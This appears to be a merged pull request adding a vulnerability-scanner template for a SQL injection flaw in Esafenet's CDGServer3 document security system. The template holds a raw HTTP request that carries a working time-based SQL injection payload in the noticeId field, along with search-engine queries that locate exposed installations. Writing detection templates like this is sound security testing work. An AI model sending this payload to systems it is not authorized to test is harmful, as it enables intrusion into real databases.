Merge pull request #10373 from adeljck/esafe-NoticeAjax-Sqli

Add esafenet-NoticeAjax-Sqli.yaml

http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml

@@ -0,0 +1,35 @@
+id: esafenet-noticeajax-sqli
+
+info:
+  name: Esafenet CDG NoticeAjax - Sql Injection
+  author: adeljck
+  severity: high
+  description: |
+    CDGServer3 NoticeAjax Interface Sql Injection.
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: title="电子文档安全管理系统",body="CDGServer3/"
+    hunter-query: web.title="电子文档安全管理系统",web.body="CDGServer3/"
+    product: electronic_document_security_management_system
+    vendor: esafenet
+  tags: esafenet,sqli
+
+http:
+  - raw:
+      - |
+        @timeout: 10s
+        POST /CDGServer3/NoticeAjax;Service HTTP/1.1
+        Host: {{Hostname}}
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+        Content-Type: application/x-www-form-urlencoded
+
+        command=delNotice&noticeId=123';if+(select+IS_SRVROLEMEMBER('sysadmin'))=1+WAITFOR+DELAY+'0:0:5'--
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(content_type,"text/xml")'
+          - 'contains(body,"OK")'
+          - 'status_code == 200'
+        condition: and